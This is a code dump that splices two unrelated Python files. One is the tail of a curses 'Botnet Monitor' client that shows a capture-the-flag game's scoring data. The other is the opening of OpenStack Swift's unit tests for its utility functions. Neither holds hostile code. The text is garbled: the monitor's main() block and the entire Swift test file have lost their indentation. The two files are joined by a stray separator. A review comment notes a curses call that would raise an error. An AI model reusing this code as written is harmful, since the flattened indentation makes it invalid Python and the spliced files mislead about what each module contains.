# > Bot Monitor
###################
class BotMonitor(object):
    """ Manages all flags and state changes """

    def __init__(self, connection_url):
        self.url = connection_url
        # Credentials are collected interactively in __credentials__().
        self.agent_name = None
        self.password = None
        # Running total of money earned, accumulated across update messages.
        self.total_income = 0
        # Thread running the currently-active footer/connecting animation.
        self.animate_thread = None
        # Set True by the ping handler; progress() consumes it to flash "PNG".
        self.pong = False

    def start(self):
        """ Initializes the screen """
        # Standard curses bring-up: colors, no echo, hidden cursor.
        self.screen = curses.initscr()
        self.__clear__()
        curses.start_color()
        curses.use_default_colors()
        self.__colors__()
        curses.noecho()
        curses.cbreak()
        curses.curs_set(0)
        self.max_y, self.max_x = self.screen.getmaxyx()
        self.screen.border(0)
        self.screen.refresh()
        self.__load__()
        # Blocks inside WebSocketApp.run_forever until the connection ends.
        self.__connect__()

    def stop(self, message=None):
        """ Gracefully exits the program """
        logging.debug("Stopping curses ui: %s" % message)
        self.__clear__()
        # Restore the terminal before killing the process outright; _exit
        # avoids waiting on any still-running animation threads.
        curses.endwin()
        os._exit(0)

    def connection_problems(self):
        """ Display connection issue, and exit """
        logging.fatal("Connection failure!")
        # auth_failure() flashes the message and then calls stop().
        self.auth_failure("CONNECTION FAILURE")

    def __connect__(self):
        """ Connect and authenticate with scoring engine """
        ws = WebSocketApp(
            self.url, on_message=on_message, on_error=on_error, on_close=on_close
        )
        # The module-level callbacks reach back into this monitor via
        # ws.monitor; credentials are sent by on_open.
        ws.monitor = self
        ws.agent_name = self.agent_name
        ws.password = self.password
        ws.on_open = on_open
        # Show the "connecting" animation until auth succeeds/fails.
        self.animate_thread = threading.Thread(target=self.__connecting__)
        self.stop_thread = False
        self.animate_thread.start()
        ws.run_forever()

    def __connecting__(self):
        """ Display connecting animation """
        self.__clear__()
        self.screen.refresh()
        prompt = " Connecting, please wait ..."
        connecting = curses.newwin(
            3,
            len(prompt) + 2,
            (old_div(self.max_y, 2)) - 1,
            (old_div((self.max_x - len(prompt)), 2)),
        )
        connecting.clear()
        connecting.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN))
        connecting.refresh()
        time.sleep(0.25)
        # Blink the prompt until stop_animate_thread() raises stop_thread.
        while not self.stop_thread:
            connecting.addstr(1, 1, " " * len(prompt))
            connecting.refresh()
            time.sleep(0.15)
            connecting.addstr(
                1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN)
            )
            connecting.refresh()
            time.sleep(0.25)
        # NOTE(review): curses window objects have no endwin() method — this
        # line looks like it would raise AttributeError when reached;
        # presumably curses.endwin() or connecting.erase() was intended.
        connecting.endwin()

    def __load__(self):
        """ Loads all required data """
        self.load_message = " Loading, please wait ... "
        self.loading_bar = curses.newwin(
            3,
            len(self.load_message) + 2,
            (old_div(self.max_y, 2)) - 1,
            (old_div((self.max_x - len(self.load_message)), 2)),
        )
        self.loading_bar.border(0)
        self.loading_bar.addstr(1, 1, self.load_message, curses.A_BOLD)
        self.loading_bar.refresh()
        time.sleep(0.5)
        # Prompt the user for account name and password.
        self.__credentials__()
        self.loading_bar.clear()

    def __interface__(self):
        """ Main interface loop """
        # Full redraw of border, title bar, grid headers and column offsets.
        self.__redraw__()
        self.screen.nodelay(1)
        self.__title__()
        self.__grid__()
        self.__positions__()
        self.screen.refresh()

    def __title__(self):
        """ Create title and footer """
        title = " Root the Box: Botnet Monitor "
        start_x = old_div((self.max_x - len(title)), 2)
        self.screen.addstr(
            0, start_x, title, curses.A_BOLD | curses.color_pair(self.BLUE)
        )
        self.screen.addstr(0, start_x - 1, "|", curses.A_BOLD)
        self.screen.addstr(0, start_x + len(title), "|", curses.A_BOLD)
        # Bottom bar
        display_time = "[ %s ]" % current_time()
        self.screen.addstr(
            self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
        )
        # Placeholder for the progress/pong indicator drawn by progress().
        self.screen.addstr(self.max_y - 1, 3, "[---]")

    def __grid__(self):
        """ Draws the grid layout """
        pos_x, pos_y = 3, 3
        self.screen.hline(2, 1, curses.ACS_HLINE, self.max_x - 2)
        self.screen.hline(4, 1, curses.ACS_HLINE, self.max_x - 2)
        # IP Address
        self.ip_title = " IP Address "
        self.screen.addstr(pos_y, 2, self.ip_title)
        self.screen.vline(
            pos_y, pos_x + len(self.ip_title), curses.ACS_VLINE, self.max_y - 4
        )
        # Box Name
        pos_x += len(self.ip_title)
        self.name_title = " Box Name "
        self.screen.addstr(pos_y, pos_x + 1, self.name_title)
        self.screen.vline(
            pos_y, pos_x + len(self.name_title) + 1, curses.ACS_VLINE, self.max_y - 4
        )
        # Bot Income
        pos_x += len(self.name_title)
        self.income_title = " Bot Income "
        self.screen.addstr(pos_y, pos_x + 2, self.income_title)

    def __positions__(self):
        """ Calculates starting x position for each column """
        self.start_ip_pos = 2
        self.start_name_pos = self.start_ip_pos + len(self.ip_title) + 3
        self.start_income_pos = self.start_name_pos + len(self.name_title) + 1

    def update_grid(self, boxes):
        """ Redraw the grid with updated box information """
        # boxes: list of (box_name, remote_ip, total_reward) tuples.
        self.__interface__()
        update_income = sum([box[2] for box in boxes])
        self.total_income += update_income
        self.__summary__(len(boxes), current_time())
        start_row = 5
        for index, box in enumerate(boxes):
            self.screen.addstr(
                start_row + index, self.start_ip_pos, "%d) %s" % (index + 1, box[0])
            )
            self.screen.addstr(start_row + index, self.start_name_pos, box[1])
            # Only show a percentage share when the round earned anything,
            # avoiding a divide-by-zero.
            if 0 < float(update_income):
                percent = (old_div(float(box[2]), float(update_income))) * 100.0
                income_string = "$%d (%.02d%s)" % (box[2], percent, "%")
            else:
                income_string = "$%d" % (box[2],)
            self.screen.addstr(start_row + index, self.start_income_pos, income_string)
        self.screen.refresh()

    def __summary__(self, bot_count, update_time):
        """ Addes total bots and update time """
        start_pos = 3
        pos_y = 1
        self.screen.addstr(
            pos_y, start_pos, "- Last Update: %s -" % update_time, curses.A_BOLD
        )
        bot_string = "$%d (%d bots)" % (self.total_income, bot_count)
        bot_pos = self.max_x - (len(bot_string) + 3)
        self.screen.addstr(pos_y, bot_pos, bot_string, curses.A_BOLD)

    def __colors__(self):
        """ Init colors pairs """
        # -1 keeps the terminal's default background (use_default_colors).
        self.NO_COLOR = -1
        self.RED = 1
        curses.init_pair(self.RED, curses.COLOR_RED, self.NO_COLOR)
        self.CYAN = 2
        curses.init_pair(self.CYAN, curses.COLOR_CYAN, self.NO_COLOR)
        self.WHITE_RED = 3
        curses.init_pair(self.WHITE_RED, curses.COLOR_WHITE, curses.COLOR_RED)
        self.BLUE = 4
        curses.init_pair(self.BLUE, curses.COLOR_BLUE, self.NO_COLOR)

    def __redraw__(self):
        """ Redraw the entire window """
        self.screen.clear()
        self.screen.border(0)
        self.screen.refresh()

    def __clear__(self):
        """ Clears the screen """
        self.screen.clear()
        self.screen.refresh()

    def __credentials__(self):
        """ Get display name from user """
        self.stop_thread = False
        # Run the cosmetic "matrix" animation while the user types.
        thread = threading.Thread(target=self.__matrix__)
        self.loading_bar.clear()
        # Get agent name
        prompt = "Account: "
        self.agent_prompt = curses.newwin(
            3,
            len(self.load_message) + 2,
            (old_div(self.max_y, 2)) - 1,
            (old_div((self.max_x - len(self.load_message)), 2)),
        )
        self.agent_prompt.clear()
        self.agent_prompt.border(0)
        self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
        # Echo keystrokes while typing the account name only.
        curses.echo()
        thread.start()
        self.agent_name = self.agent_prompt.getstr(
            1, len(prompt) + 1, len(self.load_message) - len(prompt) - 1
        )
        # Get password
        curses.noecho()
        prompt = "Password: "
        self.agent_prompt = curses.newwin(
            3,  # Height
            len(self.load_message) + 24,  # Width
            (old_div(self.max_y, 2)) - 1,  # Start Y
            (old_div((self.max_x - len(self.load_message)), 2)) - 12,  # Start X
        )
        self.agent_prompt.border(0)
        self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
        self.password = self.agent_prompt.getstr(1, len(prompt) + 1, 64)
        self.stop_thread = True
        thread.join()  # Wait for "Matrix" threads to stop

    def __matrix__(self):
        """ Displays really cool, pointless matrix like animation in the background """
        # Each stage checks stop_thread between sleeps so the animation can
        # be aborted as soon as credentials have been entered.
        # (2) Sat com animation
        sat_com = " > Initializing sat com unit, please wait ... "
        progress = ["|", "/", "-", "\\"]
        for index in range(0, random.randint(50, 150)):
            self.screen.addstr(2, 2, sat_com + progress[index % 4])
            self.screen.refresh()
            time.sleep(0.1)
            if self.stop_thread:
                return
        self.screen.addstr(2, 2, sat_com + "success")
        self.screen.refresh()
        # (3) Uplink animation
        download = " > Establishing satellite uplink: "
        for index in range(5, 25):
            signal = random.randint(0, 30)
            self.screen.addstr(3, 2, download + str(signal) + " dBi ")
            self.screen.refresh()
            time.sleep(0.2)
            if self.stop_thread:
                return
        self.screen.addstr(3, 2, download + "locked on")
        self.screen.refresh()
        # (4) Downloading animation
        download = " > Downloading noki telcodes: "
        for index in range(0, 100):
            self.screen.addstr(4, 2, download + str(index) + "%")
            self.screen.refresh()
            time.sleep(0.1)
            if self.stop_thread:
                return
        self.screen.addstr(4, 2, download + "complete")
        self.screen.refresh()
        # (5) Initializing memory address
        memory = " > Initializing memory: "
        for index in range(0, 2 ** 32, 2 ** 20):
            time.sleep(0.02)
            self.screen.addstr(5, 2, memory + str("0x%08X" % index))
            self.screen.refresh()
            if self.stop_thread:
                return
        self.screen.addstr(5, 2, memory + str("0x%08X -> 0xFFFFFFFF" % (0,)))
        self.screen.refresh()
        # (6) Matrix animation
        matrix = " > The matrix has you ... follow the white rabbit "
        for index in range(0, len(matrix)):
            time.sleep(0.2)
            self.screen.addstr(6, 2, matrix[:index])
            self.screen.refresh()
            if self.stop_thread:
                return

    def progress(self):
        """ Progress animation, executed as separate thread """
        index = 0
        progress_bar = ["=--", "-=-", "--=", "-=-"]
        pong_string = "PNG"
        while not self.stop_thread:
            if self.pong:
                # A server ping arrived since the last tick: flash "PNG".
                self.screen.addstr(self.max_y - 1, 3, "[")
                self.screen.addstr(
                    self.max_y - 1, 4, pong_string, curses.color_pair(self.WHITE_RED)
                )
                self.screen.addstr(self.max_y - 1, 7, "]")
                self.pong = False
            else:
                index += 1
                progress_string = "[%s]" % (progress_bar[index % len(progress_bar)])
                self.screen.addstr(self.max_y - 1, 3, progress_string)
            # Keep the footer clock current on every tick.
            display_time = "[ %s ]" % current_time()
            self.screen.addstr(
                self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
            )
            self.screen.refresh()
            time.sleep(0.2)

    def auth_failure(self, msg):
        """ Display authentication failure message """
        logging.info("Displaying auth failure message")
        self.__clear__()
        self.screen.refresh()
        prompt = " *** %s *** " % msg
        access_denied = curses.newwin(
            3,
            len(prompt) + 2,
            (old_div(self.max_y, 2)) - 1,
            (old_div((self.max_x - len(prompt)), 2)),
        )
        access_denied.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED))
        access_denied.refresh()
        time.sleep(0.75)
        # Blink the message five times, then exit the program.
        for index in range(0, 5):
            access_denied.addstr(1, 1, " " * len(prompt))
            access_denied.refresh()
            time.sleep(0.25)
            access_denied.addstr(
                1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED)
            )
            access_denied.refresh()
            time.sleep(0.75)
        self.stop()
###################
# > Main Entry
###################
def main(domain, port, secure, log_file, log_level):
""" Creates and starts the monitor """
hdlr = logging.FileHandler(log_file)
formatter = logging.Formatter("\r[%(levelname)s] %(asctime)s - %(message)s")
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
lvl = LOG_LEVELS.get(log_level, "notset")
logger.setLevel(lvl)
enableTrace(True)
if not secure:
url = "ws://%s:%s%s" % (domain, port, __path__)
else:
url = "wss://%s:%s%s" % (domain, port, __path__)
logging.info("Connecting to %s" % url)
bot_monitor = BotMonitor(url)
try:
bot_monitor.start()
except KeyboardInterrupt:
bot_monitor.stop_thread = True
time.sleep(0.2)
os._exit(0)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Root the Box: Botnet Monitor")
parser.add_argument(
"--version", action="version", version="%(prog)s v" + __version__
)
parser.add_argument(
"--secure",
help="connect using a ssl (default: false)",
action="store_true",
dest="secure",
)
parser.add_argument(
"--domain",
"-d",
help="scoring engine ip address, or domain (default: %s)" % __domain__,
default=__domain__,
dest="domain",
)
parser.add_argument(
"--port",
"-p",
help="network port to connect to (default: %s)" % __port__,
default=__port__,
dest="port",
)
parser.add_argument(
"--log-file",
"-f",
help="log to file (default: %s)" % __log__,
default=__log__,
dest="log_file",
)
parser.add_argument(
"--log-level",
"-l",
help="log to file (default: notset)",
default="notset",
dest="log_level",
)
args = parser.parse_args()
main(args.domain, args.port, args.secure, args.log_file, args.log_level.lower())
|
test_utils.py | # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tests for swift.common.utils """
from __future__ import with_statement
from test.unit import temptree
import ctypes
import errno
import eventlet
import logging
import os
import random
import re
import socket
import sys
from textwrap import dedent
import threading
import time
import unittest
import fcntl
import shutil
from Queue import Queue, Empty
from getpass import getuser
from shutil import rmtree
from StringIO import StringIO
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from mock import MagicMock, patch
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout)
from swift.common import utils
from swift.common.swob import Response
class MockOs():
def __init__(self, pass_funcs=[], called_funcs=[], raise_funcs=[]):
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket():
def __init__(self):
self.sent = []
def sendto(self, data, target):
self.sent.append((data, target))
def close(self):
pass
class MockSys():
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
class TestUtils(unittest.TestCase):
""" Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_normalize_timestamp(self):
""" Test swift.common.utils.normalize_timestamp """
self.assertEquals(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEquals(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEquals(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEquals(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEquals(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEquals(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEquals(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEquals(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_backwards(self):
""" Test swift.common.utils.backward """
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = ['123456789x12345678><123456789\n', # block larger than rest
'123456789x123>\n', # block ends just before \n character
'123423456789\n',
'123456789x\n', # block ends at the end of line
'<123456789x123456789x123\n',
'<6789x123\n', # block ends at the beginning of the line
'6789x1234\n',
'1234><234\n', # block ends typically in the middle of line
'123456789x123456789\n']
with TemporaryFile('r+w') as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEquals(line, lines[count].split('\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEquals([], list(utils.backward(f)))
def test_mkdirs(self):
testroot = os.path.join(os.path.dirname(__file__), 'mkdirs')
try:
os.unlink(testroot)
except Exception:
pass
rmtree(testroot, ignore_errors=1)
self.assert_(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assert_(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assert_(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
def test_split_path(self):
""" Test swift.common.utils.split_account_path """
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEquals(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEquals(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEquals(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEquals(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEquals(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEquals(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError, err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError, err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
""" Test swift.common.utils.validate_device_partition """
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError, err:
self.assertEquals(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError, err:
self.assertEquals(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
""" Test swift.common.utils.NullLogger """
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEquals(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo = utils.LoggerFileObject(logger)
print 'test1'
self.assertEquals(sio.getvalue(), '')
sys.stdout = lfo
print 'test2'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo
print >> sys.stderr, 'test4'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
sys.stdout = orig_stdout
print 'test5'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
print >> sys.stderr, 'test6'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
sys.stderr = orig_stderr
print 'test8'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
lfo.writelines(['a', 'b', 'c'])
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\n')
lfo.close()
lfo.write('d')
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo.flush()
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assert_(got_exc)
got_exc = False
try:
for line in lfo.xreadlines():
pass
except Exception:
got_exc = True
self.assert_(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEquals(conf, conf_file)
# assert defaults
self.assertEquals(options['verbose'], False)
self.assert_('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEquals(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEquals(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['verbose'], True)
self.assertEquals(options['once'], True)
self.assertEquals(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assert_('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assert_('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEquals(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEquals(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEquals(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(((),
{'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEquals(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEquals(strip_value(sio), '')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\n')
self.assertEquals(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\ntest\n')
self.assertEquals(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assert_('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('errno.ECONNREFUSED message test' not in log_msg)
self.assert_('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('ConnectionTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('MessageTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('txn' in log_msg)
self.assert_('12345' in log_msg)
# test no txn on info message
self.assertEquals(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('txn' not in log_msg)
